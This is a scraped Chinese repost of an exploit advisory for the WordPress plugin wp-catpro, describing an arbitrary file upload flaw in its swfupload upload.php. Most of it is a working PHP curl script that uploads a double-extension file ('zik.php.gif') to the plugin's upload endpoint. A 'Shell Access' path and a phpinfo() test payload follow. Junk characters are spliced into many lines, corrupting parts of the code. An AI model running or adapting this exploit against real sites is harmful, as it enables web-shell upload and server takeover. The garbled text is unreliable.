WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
' ^& H( z( z( @. ~1 ?, g, P# A
作者  => Zikou-16
6 N4 _% {! k' V( f8 h* {邮箱 => zikou16x@gmail.com
# I. |( \  x4 ]0 A测试系统 : Windows 7 , Backtrack 5r3
0 v! U/ K" y9 M+ m. G, t下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
/ \) y, z0 C  ~0 ?% g####
) I+ V( X7 D" F& i- [% @4 p
, J8 p4 @5 c6 G2 ]' q- a#=> Exploit 信息:
------------------
, c  v+ f' [/ ]/ a2 |' n6 q# 攻击者可以上传 file/shell.php.gif
& `3 l" r0 `7 {2 M  e( v+ y3 z# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
9 |6 v& d# K6 |! S# _, \: h------------------
$ @9 m, y( m, L% Y  w
( m2 t- ]/ `, d. B$ V3 L& A#=> Exploit
-----------
<?php
6 k7 L' u2 O6 d/ b
) S, X; p! w; O! u5 T2 h% r$uploadfile="zik.php.gif";
  ^! V) S7 i. B; t1 T# _8 N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
. X5 b% o' Z! P* m+ y( \curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
( z& p  |4 j- L" Y0 K7 w6 [" Vcurl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
  A  B: |9 T0 x+ }" e" R?>